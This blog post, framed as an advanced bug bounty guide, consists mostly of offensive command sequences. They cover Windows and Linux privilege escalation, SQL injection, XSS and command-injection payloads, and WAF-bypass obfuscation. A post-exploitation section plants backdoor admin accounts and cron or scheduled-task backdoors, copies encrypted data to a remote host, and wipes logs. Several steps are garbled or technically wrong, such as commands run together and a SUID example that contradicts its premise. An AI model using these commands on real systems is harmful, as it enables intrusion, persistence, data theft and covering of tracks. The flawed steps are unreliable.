Advanced Exploitation Techniques for Bug Bounty: Beyond the Basics

Very Lazy Tech

Introduction to Advanced Exploitation

Bug bounty programs offer security researchers the opportunity to find and responsibly disclose vulnerabilities in exchange for monetary rewards. While basic techniques are often sufficient for identifying common issues, advancing beyond the basics requires a deep dive into sophisticated exploitation techniques. In this article, we explore advanced methods that elevate your bug bounty skills, focusing on privilege escalation, web application exploits, and post-exploitation tactics.

Advanced Privilege Escalation Techniques

Windows Privilege Escalation

1. Exploiting Weak Service Permissions

Step 1: Identify Services with Weak Permissions
Use AccessChk to list services and their permissions:

accesschk.exe -uwcqv "C:\Program Files"

Step 2: Modify the Service

If a service is found with weak permissions, use the sc config command to change its executable path to a malicious binary:

sc config [service_name] binPath= "C:\malicious\payload.exe"

Step 3: Restart the Service

Restart the service to execute the malicious binary:

net stop [service_name] net start [service_name]

2. Token Impersonation

Step 1: Identify Tokens Available for Impersonation

Use whoami /priv to list available tokens:

whoami /priv

Step 2: Use Incognito for Token Impersonation

Use Incognito tool to list tokens and impersonate a privileged token:

incognito.exe list_tokens -u incognito.exe execute_token "DOMAIN\Username"

3. DLL Hijacking

Step 1: Identify Vulnerable Applications

Look for applications loading DLLs from user-writable directories using Process Monitor (ProcMon):

ProcMon.exe

Step 2: Replace the DLL

Replace the vulnerable DLL with a malicious one:

copy malicious.dll "C:\Program Files\VulnerableApp\"

Linux Privilege Escalation

1. SUID and SGID Executables

Step 1: Find SUID/SGID Binaries
Use find to locate binaries with SUID/SGID bits:

find / -perm -4000 -type f 2>/dev/null

Step 2: Exploit the SUID Binary

Identify a vulnerable SUID binary and exploit it. For instance, if /usr/bin/passwd is writable, replace it with a shell:

cp /bin/sh /tmp/shell chmod +s /tmp/shell /tmp/shell

2. Kernel Exploits

Step 1: Identify Kernel Version

Check the kernel version:

uname -r

Step 2: Find Exploits

Use searchsploit to find kernel exploits:

searchsploit linux kernel 4.8

Step 3: Compile and Execute Exploit

Download and compile the exploit:

gcc exploit.c -o exploit ./exploit

3. Cracking Password Hashes

Step 1: Extract Password Hashes

Extract hashes from /etc/shadow:

unshadow /etc/passwd /etc/shadow > hashes.txt

Step 2: Crack Passwords

Use John the Ripper to crack the hashes:

john hashes.txt

Advanced Web Application Exploits

SQL Injection

1. Automating SQL Injection with sqlmap

Step 1: Identify Vulnerable Parameter

Use sqlmap to test a URL for SQL injection:

sqlmap -u "http://example.com/index.php?id=1" --batch

Step 2: Enumerate Databases

Enumerate databases to confirm vulnerability:

sqlmap -u "http://example.com/index.php?id=1" --dbs

Step 3: Dump Database Tables

Dump tables from a specific database:

sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables

2. Manual SQL Injection

Step 1: Test Input Fields

Test input fields with payloads like:

' OR '1'='1' --

Step 2: Extract Data

Use extracted data to map the database structure and exploit the vulnerability further:

' UNION SELECT username, password FROM users --

Cross-Site Scripting (XSS)

1. Stored XSS

Step 1: Inject Script

Inject a script into a form that stores user input:

<script>alert('XSS')</script>

Step 2: Access Stored Script

Access the page where the script is executed:

http://example.com/view_comments.php

2. Reflected XSS

Step 1: Craft URL with Payload

Craft a URL that includes a script in the parameters:

http://example.com/search.php?q=<script>alert('XSS')</script>

Step 2: Test Reflected Payload

Test if the payload is executed in the context of the webpage:

<script>document.cookie</script>

Command Injection

1. Testing for Command Injection

Step 1: Inject Command

Test input fields with command injection payloads:

; ls -la

Step 2: Chain Commands

Chain multiple commands to execute a sequence:

; cat /etc/passwd; uname -a

2. Bypassing Web Application Firewalls (WAFs)

Step 1: Use Encoding

Encode payloads to bypass simple filters:

%3B%20ls%20-la

Step 2: Obfuscate Payloads

Use concatenation and comments to obfuscate payloads:

`cat /etc/pas`'sw'`d`

Post-Exploitation Tactics

Maintaining Access

1. Creating Backdoor Accounts

Step 1: Add a New User

Add a new user with administrative privileges in Windows:

net user hacker P@ssw0rd /add net localgroup administrators hacker /add

Step 2: Add a Cron Job in Linux

Add a cron job to execute a backdoor periodically:

echo "*/5 * * * * /path/to/backdoor" >> /etc/crontab

2. Scheduled Tasks

Step 1: Create a Scheduled Task in Windows
Create a scheduled task to maintain access:

schtasks /create /tn "Backdoor" /tr "C:\path\to\payload.exe" /sc minute /mo 5

Data Exfiltration

1. Using Encryption

Step 1: Encrypt Data

Encrypt sensitive data before exfiltration:

openssl enc -aes-256-cbc -salt -in secret.txt -out secret.txt.enc

Step 2: Transfer Encrypted Data

Use secure methods to transfer encrypted data, such as SCP:

scp secret.txt.enc user@remotehost:/path/to/destination

2. Clearing Logs

Step 1: Clear Windows Event Logs

Clear event logs to remove traces:

wevtutil cl Application

Step 2: Clear Linux Logs

Clear log files in Linux:

cat /dev/null > /var/log/auth.log

📎 If You like my content and you want some more, View On My Shop bundle of 20+ E-Books for your OSCP!

📎 Buy me a Coffee

Search This Blog

Very Lazy Tech – Cybersecurity, Ethical Hacking & Bug Bounty Insights 🔥💻